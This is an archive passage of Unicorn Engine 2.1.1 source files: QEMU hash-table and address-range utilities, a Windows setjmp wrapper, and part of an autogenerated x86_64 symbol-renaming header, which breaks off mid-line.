*b, int pos) { if (pos == QHT_BUCKET_ENTRIES - 1) { if (b->next == NULL) { return true; } return b->next->pointers[0] == NULL; } return b->pointers[pos + 1] == NULL; } static void qht_entry_move(struct qht_bucket *to, int i, struct qht_bucket *from, int j) { qht_debug_assert(!(to == from && i == j)); qht_debug_assert(to->pointers[i]); qht_debug_assert(from->pointers[j]); to->hashes[i] = from->hashes[j]; to->pointers[i] = from->pointers[j]; from->hashes[j] = 0; from->pointers[j] = NULL; } /* * Find the last valid entry in @orig, and swap it with @orig[pos], which has * just been invalidated. */ static inline void qht_bucket_remove_entry(struct qht_bucket *orig, int pos) { struct qht_bucket *b = orig; struct qht_bucket *prev = NULL; int i; if (qht_entry_is_last(orig, pos)) { orig->hashes[pos] = 0; orig->pointers[pos] = NULL; return; } do { for (i = 0; i < QHT_BUCKET_ENTRIES; i++) { if (b->pointers[i]) { continue; } if (i > 0) { qht_entry_move(orig, pos, b, i - 1); return; } qht_debug_assert(prev); qht_entry_move(orig, pos, prev, QHT_BUCKET_ENTRIES - 1); return; } prev = b; b = b->next; } while (b); /* no free entries other than orig[pos], so swap it with the last one */ qht_entry_move(orig, pos, prev, QHT_BUCKET_ENTRIES - 1); } /* call with b->lock held */ static inline bool qht_remove__locked(struct qht_bucket *head, const void *p, uint32_t hash) { struct qht_bucket *b = head; int i; do { for (i = 0; i < QHT_BUCKET_ENTRIES; i++) { void *q = b->pointers[i]; if (unlikely(q == NULL)) { return false; } if (q == p) { qht_debug_assert(b->hashes[i] == hash); qht_bucket_remove_entry(b, i); return true; } } b = b->next; } while (b); return false; } bool qht_remove(struct qht *ht, const void *p, uint32_t hash) { struct qht_bucket *b; struct qht_map *map; bool ret; /* NULL pointers are not supported */ qht_debug_assert(p); b = qht_bucket_lock__no_stale(ht, hash, &map); ret = qht_remove__locked(b, p, hash); return ret; } static inline void qht_bucket_iter(struct uc_struct *uc, struct qht_bucket *head, const struct qht_iter *iter, void *userp) { struct qht_bucket *b = head; int i; do { for (i = 0; i < QHT_BUCKET_ENTRIES; i++) { if (b->pointers[i] == NULL) { return; } switch (iter->type) { case QHT_ITER_VOID: iter->f.retvoid(uc, b->pointers[i], b->hashes[i], userp); break; case QHT_ITER_RM: if (iter->f.retbool(b->pointers[i], b->hashes[i], userp)) { /* replace i with the last valid element in the bucket */ qht_bucket_remove_entry(b, i); /* reevaluate i, since it just got replaced */ i--; continue; } break; default: g_assert_not_reached(); } } b = b->next; } while (b); } /* call with all of the map's locks held */ static inline void qht_map_iter__all_locked(struct uc_struct *uc, struct qht_map *map, const struct qht_iter *iter, void *userp) { size_t i; for (i = 0; i < map->n_buckets; i++) { qht_bucket_iter(uc, &map->buckets[i], iter, userp); } } static inline void do_qht_iter(struct uc_struct *uc, struct qht *ht, const struct qht_iter *iter, void *userp) { struct qht_map *map; map = ht->map; qht_map_iter__all_locked(uc, map, iter, userp); } void qht_iter(struct uc_struct *uc, struct qht *ht, qht_iter_func_t func, void *userp) { const struct qht_iter iter = { .f.retvoid = func, .type = QHT_ITER_VOID, }; do_qht_iter(uc, ht, &iter, userp); } void qht_iter_remove(struct uc_struct *uc, struct qht *ht, qht_iter_bool_func_t func, void *userp) { const struct qht_iter iter = { .f.retbool = func, .type = QHT_ITER_RM, }; do_qht_iter(uc, ht, &iter, userp); } struct qht_map_copy_data { struct qht *ht; struct qht_map *new; }; static void qht_map_copy(struct uc_struct *uc, void *p, uint32_t hash, void *userp) { struct qht_map_copy_data *data = userp; struct qht *ht = data->ht; struct qht_map *new = data->new; struct qht_bucket *b = qht_map_to_bucket(new, hash); /* no need to acquire b->lock because no thread has seen this map yet */ qht_insert__locked(uc, ht, new, b, p, hash, NULL); } /* * Atomically perform a resize and/or reset. * Call with ht->lock held. */ static void qht_do_resize_reset(struct uc_struct *uc, struct qht *ht, struct qht_map *new, bool reset) { struct qht_map *old; const struct qht_iter iter = { .f.retvoid = qht_map_copy, .type = QHT_ITER_VOID, }; struct qht_map_copy_data data; old = ht->map; if (reset) { qht_map_reset__all_locked(old); } if (new == NULL) { return; } g_assert(new->n_buckets != old->n_buckets); data.ht = ht; data.new = new; qht_map_iter__all_locked(uc, old, &iter, &data); ht->map = new; qht_map_destroy(old); } bool qht_resize(struct uc_struct *uc, struct qht *ht, size_t n_elems) { size_t n_buckets = qht_elems_to_buckets(n_elems); size_t ret = false; if (n_buckets != ht->map->n_buckets) { struct qht_map *new; new = qht_map_create(n_buckets); qht_do_resize(uc, ht, new); ret = true; } return ret; } /* pass @stats to qht_statistics_destroy() when done */ void qht_statistics_init(const struct qht *ht, struct qht_stats *stats) { const struct qht_map *map; int i; map = ht->map; stats->used_head_buckets = 0; stats->entries = 0; qdist_init(&stats->chain); qdist_init(&stats->occupancy); /* bail out if the qht has not yet been initialized */ if (unlikely(map == NULL)) { stats->head_buckets = 0; return; } stats->head_buckets = map->n_buckets; for (i = 0; i < map->n_buckets; i++) { const struct qht_bucket *head = &map->buckets[i]; const struct qht_bucket *b; size_t buckets; size_t entries; int j; buckets = 0; entries = 0; b = head; do { for (j = 0; j < QHT_BUCKET_ENTRIES; j++) { if (b->pointers[j] == NULL) { break; } entries++; } buckets++; b = b->next; } while (b); if (entries) { qdist_inc(&stats->chain, buckets); qdist_inc(&stats->occupancy, (double)entries / QHT_BUCKET_ENTRIES / buckets); stats->used_head_buckets++; stats->entries += entries; } else { qdist_inc(&stats->occupancy, 0); } } } void qht_statistics_destroy(struct qht_stats *stats) { qdist_destroy(&stats->occupancy); qdist_destroy(&stats->chain); } ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/util/range.c���������������������������������������������������������������������0000664�0000000�0000000�00000004257�14675241067�0016400�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU 64-bit address ranges * * Copyright (c) 2015-2016 Red Hat, Inc. * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "qemu/range.h" /* * Return -1 if @a < @b, 1 @a > @b, and 0 if they touch or overlap. * Both @a and @b must not be empty. */ static inline int range_compare(Range *a, Range *b) { assert(!range_is_empty(a) && !range_is_empty(b)); /* Careful, avoid wraparound */ if (b->lob && b->lob - 1 > a->upb) { return -1; } if (a->lob && a->lob - 1 > b->upb) { return 1; } return 0; } /* Insert @data into @list of ranges; caller no longer owns @data */ GList *range_list_insert(GList *list, Range *data) { GList *l; assert(!range_is_empty(data)); /* Skip all list elements strictly less than data */ for (l = list; l && range_compare(l->data, data) < 0; l = l->next) { } if (!l || range_compare(l->data, data) > 0) { /* Rest of the list (if any) is strictly greater than @data */ return g_list_insert_before(list, l, data); } /* Current list element overlaps @data, merge the two */ range_extend(l->data, data); g_free(data); /* Merge any subsequent list elements that now also overlap */ while (l->next && range_compare(l->data, l->next->data) == 0) { #ifndef NDEBUG GList *new_l; #endif range_extend(l->data, l->next->data); g_free(l->next->data); #ifndef NDEBUG new_l = g_list_delete_link(list, l->next); assert(new_l == list); #else g_list_delete_link(list, l->next); #endif } return list; } �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/util/setjmp-wrapper-win32.asm����������������������������������������������������0000664�0000000�0000000�00000001533�14675241067�0021554�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������EXTERN _setjmp: proc PUBLIC _setjmp_wrapper _TEXT SEGMENT _setjmp_wrapper PROC ; Why do we need this wrapper? ; Short answer: Windows default implementation of setjmp/longjmp is incompatible with generated code. ; A longer answer: https://blog.lazym.io/2020/09/21/Unicorn-Devblog-setjmp-longjmp-on-Windows/. ; From qemu os-win32 comments: ; > On w64, setjmp is implemented by _setjmp which needs a second parameter. ; > If this parameter is NULL, longjump does no stack unwinding. ; > That is what we need for QEMU. Passing the value of register rsp (default) ; > lets longjmp try a stack unwinding which will crash with generated code. ; It's true indeed, but MSVC doesn't has a setjmp signature which receives two arguements. ; Therefore, we add a wrapper to keep the second argument zero. xor rdx, rdx jmp _setjmp _setjmp_wrapper ENDP _TEXT ENDS END���������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/vl.h�����������������������������������������������������������������������������0000664�0000000�0000000�00000000124�14675241067�0014742�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#ifndef VL_H_ #define VL_H_ int machine_initialize(struct uc_struct *uc); #endif ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/x86_64.h�������������������������������������������������������������������������0000664�0000000�0000000�00000311252�14675241067�0015266�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Autogen header for Unicorn Engine - DONOT MODIFY */ #ifndef UNICORN_AUTOGEN_x86_64_H #define UNICORN_AUTOGEN_x86_64_H #ifndef UNICORN_ARCH_POSTFIX #define UNICORN_ARCH_POSTFIX _x86_64 #endif #define unicorn_fill_tlb unicorn_fill_tlb_x86_64 #define reg_read reg_read_x86_64 #define reg_write reg_write_x86_64 #define uc_init uc_init_x86_64 #define uc_add_inline_hook uc_add_inline_hook_x86_64 #define uc_del_inline_hook uc_del_inline_hook_x86_64 #define tb_invalidate_phys_range tb_invalidate_phys_range_x86_64 #define use_idiv_instructions use_idiv_instructions_x86_64 #define arm_arch arm_arch_x86_64 #define tb_target_set_jmp_target tb_target_set_jmp_target_x86_64 #define have_bmi1 have_bmi1_x86_64 #define have_popcnt have_popcnt_x86_64 #define have_avx1 have_avx1_x86_64 #define have_avx2 have_avx2_x86_64 #define have_isa have_isa_x86_64 #define have_altivec have_altivec_x86_64 #define have_vsx have_vsx_x86_64 #define flush_icache_range flush_icache_range_x86_64 #define s390_facilities s390_facilities_x86_64 #define tcg_dump_op tcg_dump_op_x86_64 #define tcg_dump_ops tcg_dump_ops_x86_64 #define tcg_gen_and_i64 tcg_gen_and_i64_x86_64 #define tcg_gen_discard_i64 tcg_gen_discard_i64_x86_64 #define tcg_gen_ld16s_i64 tcg_gen_ld16s_i64_x86_64 #define tcg_gen_ld16u_i64 tcg_gen_ld16u_i64_x86_64 #define tcg_gen_ld32s_i64 tcg_gen_ld32s_i64_x86_64 #define tcg_gen_ld32u_i64 tcg_gen_ld32u_i64_x86_64 #define tcg_gen_ld8s_i64 tcg_gen_ld8s_i64_x86_64 #define tcg_gen_ld8u_i64 tcg_gen_ld8u_i64_x86_64 #define tcg_gen_ld_i64 tcg_gen_ld_i64_x86_64 #define tcg_gen_mov_i64 tcg_gen_mov_i64_x86_64 #define tcg_gen_movi_i64 tcg_gen_movi_i64_x86_64 #define tcg_gen_mul_i64 tcg_gen_mul_i64_x86_64 #define tcg_gen_or_i64 tcg_gen_or_i64_x86_64 #define tcg_gen_sar_i64 tcg_gen_sar_i64_x86_64 #define tcg_gen_shl_i64 tcg_gen_shl_i64_x86_64 #define tcg_gen_shr_i64 tcg_gen_shr_i64_x86_64 #define tcg_gen_st_i64 tcg_gen_st_i64_x86_64 #define tcg_gen_xor_i64 tcg_gen_xor_i64_x86_64 #define cpu_icount_to_ns cpu_icount_to_ns_x86_64 #define cpu_is_stopped cpu_is_stopped_x86_64 #define cpu_get_ticks cpu_get_ticks_x86_64 #define cpu_get_clock cpu_get_clock_x86_64 #define cpu_resume cpu_resume_x86_64 #define qemu_init_vcpu qemu_init_vcpu_x86_64 #define cpu_stop_current cpu_stop_current_x86_64 #define resume_all_vcpus resume_all_vcpus_x86_64 #define vm_start vm_start_x86_64 #define address_space_dispatch_compact address_space_dispatch_compact_x86_64 #define flatview_translate flatview_translate_x86_64 #define address_space_translate_for_iotlb address_space_translate_for_iotlb_x86_64 #define qemu_get_cpu qemu_get_cpu_x86_64 #define cpu_address_space_init cpu_address_space_init_x86_64 #define cpu_get_address_space cpu_get_address_space_x86_64 #define cpu_exec_unrealizefn cpu_exec_unrealizefn_x86_64 #define cpu_exec_initfn cpu_exec_initfn_x86_64 #define cpu_exec_realizefn cpu_exec_realizefn_x86_64 #define tb_invalidate_phys_addr tb_invalidate_phys_addr_x86_64 #define cpu_watchpoint_insert cpu_watchpoint_insert_x86_64 #define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_x86_64 #define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_x86_64 #define cpu_watchpoint_address_matches cpu_watchpoint_address_matches_x86_64 #define cpu_breakpoint_insert cpu_breakpoint_insert_x86_64 #define cpu_breakpoint_remove cpu_breakpoint_remove_x86_64 #define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_x86_64 #define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_x86_64 #define cpu_abort cpu_abort_x86_64 #define cpu_physical_memory_test_and_clear_dirty cpu_physical_memory_test_and_clear_dirty_x86_64 #define memory_region_section_get_iotlb memory_region_section_get_iotlb_x86_64 #define flatview_add_to_dispatch flatview_add_to_dispatch_x86_64 #define qemu_ram_get_host_addr qemu_ram_get_host_addr_x86_64 #define qemu_ram_get_offset qemu_ram_get_offset_x86_64 #define qemu_ram_get_used_length qemu_ram_get_used_length_x86_64 #define qemu_ram_is_shared qemu_ram_is_shared_x86_64 #define qemu_ram_pagesize qemu_ram_pagesize_x86_64 #define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_x86_64 #define qemu_ram_alloc qemu_ram_alloc_x86_64 #define qemu_ram_free qemu_ram_free_x86_64 #define qemu_map_ram_ptr qemu_map_ram_ptr_x86_64 #define qemu_ram_block_host_offset qemu_ram_block_host_offset_x86_64 #define qemu_ram_block_from_host qemu_ram_block_from_host_x86_64 #define qemu_ram_addr_from_host qemu_ram_addr_from_host_x86_64 #define cpu_check_watchpoint cpu_check_watchpoint_x86_64 #define iotlb_to_section iotlb_to_section_x86_64 #define address_space_dispatch_new address_space_dispatch_new_x86_64 #define address_space_dispatch_free address_space_dispatch_free_x86_64 #define flatview_read_continue flatview_read_continue_x86_64 #define address_space_read_full address_space_read_full_x86_64 #define address_space_write address_space_write_x86_64 #define address_space_rw address_space_rw_x86_64 #define cpu_physical_memory_rw cpu_physical_memory_rw_x86_64 #define address_space_write_rom address_space_write_rom_x86_64 #define cpu_flush_icache_range cpu_flush_icache_range_x86_64 #define cpu_exec_init_all cpu_exec_init_all_x86_64 #define address_space_access_valid address_space_access_valid_x86_64 #define address_space_map address_space_map_x86_64 #define address_space_unmap address_space_unmap_x86_64 #define cpu_physical_memory_map cpu_physical_memory_map_x86_64 #define cpu_physical_memory_unmap cpu_physical_memory_unmap_x86_64 #define cpu_memory_rw_debug cpu_memory_rw_debug_x86_64 #define qemu_target_page_size qemu_target_page_size_x86_64 #define qemu_target_page_bits qemu_target_page_bits_x86_64 #define qemu_target_page_bits_min qemu_target_page_bits_min_x86_64 #define target_words_bigendian target_words_bigendian_x86_64 #define cpu_physical_memory_is_io cpu_physical_memory_is_io_x86_64 #define ram_block_discard_range ram_block_discard_range_x86_64 #define ramblock_is_pmem ramblock_is_pmem_x86_64 #define page_size_init page_size_init_x86_64 #define set_preferred_target_page_bits set_preferred_target_page_bits_x86_64 #define finalize_target_page_bits finalize_target_page_bits_x86_64 #define cpu_outb cpu_outb_x86_64 #define cpu_outw cpu_outw_x86_64 #define cpu_outl cpu_outl_x86_64 #define cpu_inb cpu_inb_x86_64 #define cpu_inw cpu_inw_x86_64 #define cpu_inl cpu_inl_x86_64 #define memory_map memory_map_x86_64 #define memory_map_io memory_map_io_x86_64 #define memory_map_ptr memory_map_ptr_x86_64 #define memory_cow memory_cow_x86_64 #define memory_unmap memory_unmap_x86_64 #define memory_moveout memory_moveout_x86_64 #define memory_movein memory_movein_x86_64 #define memory_free memory_free_x86_64 #define flatview_unref flatview_unref_x86_64 #define address_space_get_flatview address_space_get_flatview_x86_64 #define memory_region_transaction_begin memory_region_transaction_begin_x86_64 #define memory_region_transaction_commit memory_region_transaction_commit_x86_64 #define memory_region_init memory_region_init_x86_64 #define memory_region_access_valid memory_region_access_valid_x86_64 #define memory_region_dispatch_read memory_region_dispatch_read_x86_64 #define memory_region_dispatch_write memory_region_dispatch_write_x86_64 #define memory_region_init_io memory_region_init_io_x86_64 #define memory_region_init_ram_ptr memory_region_init_ram_ptr_x86_64 #define memory_region_size memory_region_size_x86_64 #define memory_region_set_readonly memory_region_set_readonly_x86_64 #define memory_region_get_ram_ptr memory_region_get_ram_ptr_x86_64 #define memory_region_from_host memory_region_from_host_x86_64 #define memory_region_get_ram_addr memory_region_get_ram_addr_x86_64 #define memory_region_add_subregion memory_region_add_subregion_x86_64 #define memory_region_del_subregion memory_region_del_subregion_x86_64 #define memory_region_add_subregion_overlap memory_region_add_subregion_overlap_x86_64 #define memory_region_find memory_region_find_x86_64 #define memory_region_filter_subregions memory_region_filter_subregions_x86_64 #define memory_listener_register memory_listener_register_x86_64 #define memory_listener_unregister memory_listener_unregister_x86_64 #define address_space_remove_listeners address_space_remove_listeners_x86_64 #define address_space_init address_space_init_x86_64 #define address_space_destroy address_space_destroy_x86_64 #define memory_region_init_ram memory_region_init_ram_x86_64 #define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_x86_64 #define find_memory_mapping find_memory_mapping_x86_64 #define exec_inline_op exec_inline_op_x86_64 #define floatx80_default_nan floatx80_default_nan_x86_64 #define float_raise float_raise_x86_64 #define float16_is_quiet_nan float16_is_quiet_nan_x86_64 #define float16_is_signaling_nan float16_is_signaling_nan_x86_64 #define float32_is_quiet_nan float32_is_quiet_nan_x86_64 #define float32_is_signaling_nan float32_is_signaling_nan_x86_64 #define float64_is_quiet_nan float64_is_quiet_nan_x86_64 #define float64_is_signaling_nan float64_is_signaling_nan_x86_64 #define floatx80_is_quiet_nan floatx80_is_quiet_nan_x86_64 #define floatx80_is_signaling_nan floatx80_is_signaling_nan_x86_64 #define floatx80_silence_nan floatx80_silence_nan_x86_64 #define propagateFloatx80NaN propagateFloatx80NaN_x86_64 #define float128_is_quiet_nan float128_is_quiet_nan_x86_64 #define float128_is_signaling_nan float128_is_signaling_nan_x86_64 #define float128_silence_nan float128_silence_nan_x86_64 #define float16_add float16_add_x86_64 #define float16_sub float16_sub_x86_64 #define float32_add float32_add_x86_64 #define float32_sub float32_sub_x86_64 #define float64_add float64_add_x86_64 #define float64_sub float64_sub_x86_64 #define float16_mul float16_mul_x86_64 #define float32_mul float32_mul_x86_64 #define float64_mul float64_mul_x86_64 #define float16_muladd float16_muladd_x86_64 #define float32_muladd float32_muladd_x86_64 #define float64_muladd float64_muladd_x86_64 #define float16_div float16_div_x86_64 #define float32_div float32_div_x86_64 #define float64_div float64_div_x86_64 #define float16_to_float32 float16_to_float32_x86_64 #define float16_to_float64 float16_to_float64_x86_64 #define float32_to_float16 float32_to_float16_x86_64 #define float32_to_float64 float32_to_float64_x86_64 #define float64_to_float16 float64_to_float16_x86_64 #define float64_to_float32 float64_to_float32_x86_64 #define float16_round_to_int float16_round_to_int_x86_64 #define float32_round_to_int float32_round_to_int_x86_64 #define float64_round_to_int float64_round_to_int_x86_64 #define float16_to_int16_scalbn float16_to_int16_scalbn_x86_64 #define float16_to_int32_scalbn float16_to_int32_scalbn_x86_64 #define float16_to_int64_scalbn float16_to_int64_scalbn_x86_64 #define float32_to_int16_scalbn float32_to_int16_scalbn_x86_64 #define float32_to_int32_scalbn float32_to_int32_scalbn_x86_64 #define float32_to_int64_scalbn float32_to_int64_scalbn_x86_64 #define float64_to_int16_scalbn float64_to_int16_scalbn_x86_64 #define float64_to_int32_scalbn float64_to_int32_scalbn_x86_64 #define float64_to_int64_scalbn float64_to_int64_scalbn_x86_64 #define float16_to_int16 float16_to_int16_x86_64 #define float16_to_int32 float16_to_int32_x86_64 #define float16_to_int64 float16_to_int64_x86_64 #define float32_to_int16 float32_to_int16_x86_64 #define float32_to_int32 float32_to_int32_x86_64 #define float32_to_int64 float32_to_int64_x86_64 #define float64_to_int16 float64_to_int16_x86_64 #define float64_to_int32 float64_to_int32_x86_64 #define float64_to_int64 float64_to_int64_x86_64 #define float16_to_int16_round_to_zero float16_to_int16_round_to_zero_x86_64 #define float16_to_int32_round_to_zero float16_to_int32_round_to_zero_x86_64 #define float16_to_int64_round_to_zero float16_to_int64_round_to_zero_x86_64 #define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_x86_64 #define float32_to_int32_round_to_zero float32_to_int32_round_to_zero_x86_64 #define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_x86_64 #define float64_to_int16_round_to_zero float64_to_int16_round_to_zero_x86_64 #define float64_to_int32_round_to_zero float64_to_int32_round_to_zero_x86_64 #define float64_to_int64_round_to_zero float64_to_int64_round_to_zero_x86_64 #define float16_to_uint16_scalbn float16_to_uint16_scalbn_x86_64 #define float16_to_uint32_scalbn float16_to_uint32_scalbn_x86_64 #define float16_to_uint64_scalbn float16_to_uint64_scalbn_x86_64 #define float32_to_uint16_scalbn float32_to_uint16_scalbn_x86_64 #define float32_to_uint32_scalbn float32_to_uint32_scalbn_x86_64 #define float32_to_uint64_scalbn float32_to_uint64_scalbn_x86_64 #define float64_to_uint16_scalbn float64_to_uint16_scalbn_x86_64 #define float64_to_uint32_scalbn float64_to_uint32_scalbn_x86_64 #define float64_to_uint64_scalbn float64_to_uint64_scalbn_x86_64 #define float16_to_uint16 float16_to_uint16_x86_64 #define float16_to_uint32 float16_to_uint32_x86_64 #define float16_to_uint64 float16_to_uint64_x86_64 #define float32_to_uint16 float32_to_uint16_x86_64 #define float32_to_uint32 float32_to_uint32_x86_64 #define float32_to_uint64 float32_to_uint64_x86_64 #define float64_to_uint16 float64_to_uint16_x86_64 #define float64_to_uint32 float64_to_uint32_x86_64 #define float64_to_uint64 float64_to_uint64_x86_64 #define float16_to_uint16_round_to_zero float16_to_uint16_round_to_zero_x86_64 #define float16_to_uint32_round_to_zero float16_to_uint32_round_to_zero_x86_64 #define float16_to_uint64_round_to_zero float16_to_uint64_round_to_zero_x86_64 #define float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_x86_64 #define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_x86_64 #define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_x86_64 #define float64_to_uint16_round_to_zero float64_to_uint16_round_to_zero_x86_64 #define float64_to_uint32_round_to_zero float64_to_uint32_round_to_zero_x86_64 #define float64_to_uint64_round_to_zero float64_to_uint64_round_to_zero_x86_64 #define int64_to_float16_scalbn int64_to_float16_scalbn_x86_64 #define int32_to_float16_scalbn int32_to_float16_scalbn_x86_64 #define int16_to_float16_scalbn int16_to_float16_scalbn_x86_64 #define int64_to_float16 int64_to_float16_x86_64 #define int32_to_float16 int32_to_float16_x86_64 #define int16_to_float16 int16_to_float16_x86_64 #define int64_to_float32_scalbn int64_to_float32_scalbn_x86_64 #define int32_to_float32_scalbn int32_to_float32_scalbn_x86_64 #define int16_to_float32_scalbn int16_to_float32_scalbn_x86_64 #define int64_to_float32 int64_to_float32_x86_64 #define int32_to_float32 int32_to_float32_x86_64 #define int16_to_float32 int16_to_float32_x86_64 #define int64_to_float64_scalbn int64_to_float64_scalbn_x86_64 #define int32_to_float64_scalbn int32_to_float64_scalbn_x86_64 #define int16_to_float64_scalbn int16_to_float64_scalbn_x86_64 #define int64_to_float64 int64_to_float64_x86_64 #define int32_to_float64 int32_to_float64_x86_64 #define int16_to_float64 int16_to_float64_x86_64 #define uint64_to_float16_scalbn uint64_to_float16_scalbn_x86_64 #define uint32_to_float16_scalbn uint32_to_float16_scalbn_x86_64 #define uint16_to_float16_scalbn uint16_to_float16_scalbn_x86_64 #define uint64_to_float16 uint64_to_float16_x86_64 #define uint32_to_float16 uint32_to_float16_x86_64 #define uint16_to_float16 uint16_to_float16_x86_64 #define uint64_to_float32_scalbn uint64_to_float32_scalbn_x86_64 #define uint32_to_float32_scalbn uint32_to_float32_scalbn_x86_64 #define uint16_to_float32_scalbn uint16_to_float32_scalbn_x86_64 #define uint64_to_float32 uint64_to_float32_x86_64 #define uint32_to_float32 uint32_to_float32_x86_64 #define uint16_to_float32 uint16_to_float32_x86_64 #define uint64_to_float64_scalbn uint64_to_float64_scalbn_x86_64 #define uint32_to_float64_scalbn uint32_to_float64_scalbn_x86_64 #define uint16_to_float64_scalbn uint16_to_float64_scalbn_x86_64 #define uint64_to_float64 uint64_to_float64_x86_64 #define uint32_to_float64 uint32_to_float64_x86_64 #define uint16_to_float64 uint16_to_float64_x86_64 #define float16_min float16_min_x86_64 #define float16_minnum float16_minnum_x86_64 #define float16_minnummag float16_minnummag_x86_64 #define float16_max float16_max_x86_64 #define float16_maxnum float16_maxnum_x86_64 #define float16_maxnummag float16_maxnummag_x86_64 #define float32_min float32_min_x86_64 #define float32_minnum float32_minnum_x86_64 #define float32_minnummag float32_minnummag_x86_64 #define float32_max float32_max_x86_64 #define float32_maxnum float32_maxnum_x86_64 #define float32_maxnummag float32_maxnummag_x86_64 #define float64_min float64_min_x86_64 #define float64_minnum float64_minnum_x86_64 #define float64_minnummag float64_minnummag_x86_64 #define float64_max float64_max_x86_64 #define float64_maxnum float64_maxnum_x86_64 #define float64_maxnummag float64_maxnummag_x86_64 #define float16_compare float16_compare_x86_64 #define float16_compare_quiet float16_compare_quiet_x86_64 #define float32_compare float32_compare_x86_64 #define float32_compare_quiet float32_compare_quiet_x86_64 #define float64_compare float64_compare_x86_64 #define float64_compare_quiet float64_compare_quiet_x86_64 #define float16_scalbn float16_scalbn_x86_64 #define float32_scalbn float32_scalbn_x86_64 #define float64_scalbn float64_scalbn_x86_64 #define float16_sqrt float16_sqrt_x86_64 #define float32_sqrt float32_sqrt_x86_64 #define float64_sqrt float64_sqrt_x86_64 #define float16_default_nan float16_default_nan_x86_64 #define float32_default_nan float32_default_nan_x86_64 #define float64_default_nan float64_default_nan_x86_64 #define float128_default_nan float128_default_nan_x86_64 #define float16_silence_nan float16_silence_nan_x86_64 #define float32_silence_nan float32_silence_nan_x86_64 #define float64_silence_nan float64_silence_nan_x86_64 #define float16_squash_input_denormal float16_squash_input_denormal_x86_64 #define float32_squash_input_denormal float32_squash_input_denormal_x86_64 #define float64_squash_input_denormal float64_squash_input_denormal_x86_64 #define normalizeFloatx80Subnormal normalizeFloatx80Subnormal_x86_64 #define roundAndPackFloatx80 roundAndPackFloatx80_x86_64 #define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_x86_64 #define int32_to_floatx80 int32_to_floatx80_x86_64 #define int32_to_float128 int32_to_float128_x86_64 #define int64_to_floatx80 int64_to_floatx80_x86_64 #define int64_to_float128 int64_to_float128_x86_64 #define uint64_to_float128 uint64_to_float128_x86_64 #define float32_to_floatx80 float32_to_floatx80_x86_64 #define float32_to_float128 float32_to_float128_x86_64 #define float32_rem float32_rem_x86_64 #define float32_exp2 float32_exp2_x86_64 #define float32_log2 float32_log2_x86_64 #define float32_eq float32_eq_x86_64 #define float32_le float32_le_x86_64 #define float32_lt float32_lt_x86_64 #define float32_unordered float32_unordered_x86_64 #define float32_eq_quiet float32_eq_quiet_x86_64 #define float32_le_quiet float32_le_quiet_x86_64 #define float32_lt_quiet float32_lt_quiet_x86_64 #define float32_unordered_quiet float32_unordered_quiet_x86_64 #define float64_to_floatx80 float64_to_floatx80_x86_64 #define float64_to_float128 float64_to_float128_x86_64 #define float64_rem float64_rem_x86_64 #define float64_log2 float64_log2_x86_64 #define float64_eq float64_eq_x86_64 #define float64_le float64_le_x86_64 #define float64_lt float64_lt_x86_64 #define float64_unordered float64_unordered_x86_64 #define float64_eq_quiet float64_eq_quiet_x86_64 #define float64_le_quiet float64_le_quiet_x86_64 #define float64_lt_quiet float64_lt_quiet_x86_64 #define float64_unordered_quiet float64_unordered_quiet_x86_64 #define floatx80_to_int32 floatx80_to_int32_x86_64 #define floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_x86_64 #define floatx80_to_int64 floatx80_to_int64_x86_64 #define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_x86_64 #define floatx80_to_float32 floatx80_to_float32_x86_64 #define floatx80_to_float64 floatx80_to_float64_x86_64 #define floatx80_to_float128 floatx80_to_float128_x86_64 #define floatx80_round floatx80_round_x86_64 #define floatx80_round_to_int floatx80_round_to_int_x86_64 #define floatx80_add floatx80_add_x86_64 #define floatx80_sub floatx80_sub_x86_64 #define floatx80_mul floatx80_mul_x86_64 #define floatx80_div floatx80_div_x86_64 #define floatx80_rem floatx80_rem_x86_64 #define floatx80_sqrt floatx80_sqrt_x86_64 #define floatx80_eq floatx80_eq_x86_64 #define floatx80_le floatx80_le_x86_64 #define floatx80_lt floatx80_lt_x86_64 #define floatx80_unordered floatx80_unordered_x86_64 #define floatx80_eq_quiet floatx80_eq_quiet_x86_64 #define floatx80_le_quiet floatx80_le_quiet_x86_64 #define floatx80_lt_quiet floatx80_lt_quiet_x86_64 #define floatx80_unordered_quiet floatx80_unordered_quiet_x86_64 #define float128_to_int32 float128_to_int32_x86_64 #define 